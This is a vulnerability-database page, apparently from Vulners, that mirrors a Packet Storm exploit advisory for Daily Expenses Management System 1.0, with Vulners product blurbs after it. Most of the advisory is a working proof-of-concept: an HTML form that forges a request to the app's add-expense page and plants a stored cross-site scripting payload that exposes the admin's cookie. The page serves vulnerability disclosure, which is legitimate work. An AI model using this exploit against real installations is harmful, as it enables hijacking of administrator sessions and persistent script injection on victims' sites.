Lucene search
K

Daily Expenses Management System 1.0 Cross SIte Request Forgery

🗓️ 06 Aug 2020 00:00:00Reported by Edo MalandType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 129 Views

Daily Expenses Management System 1.0 Cross-Site Request Forgery Lead to Persistent Cross-Site Scripting (CSRF to XSS Stored

Code
`# Exploit Title: Daily Expenses Management System 1.0 - Cross-Site Request Forgery  
# Date: 2020-8-5  
# Exploit Author: Edo Maland  
# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html  
# Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html  
# Version: 1.0  
# Tested on: XAMPP / Windows 10  
  
# Vulnerability Details  
# Description : Cross-Site Request Forgery Lead to Persistent Cross-Site Scripting (CSRF to XSS Stored)  
  
# POC  
  
An attacker can force the admin to add a product  
  
URL : https://example.com/dets/manage-expense.php  
- Feature : Add Expense  
  
  
# CSRF HTML  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="https://example.com/dets/add-expense.php" method="POST">  
<input type="hidden" name="dateexpense" value="2020-08-12" />  
<input type="hidden" name="item" value="<img src=xss onerror=alert(document.cookie)>" />  
<input type="hidden" name="costitem" value="1337" />  
<input type="hidden" name="submit" value="" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Aug 2020 00:00Current
7.4High risk
Vulners AI Score7.4
129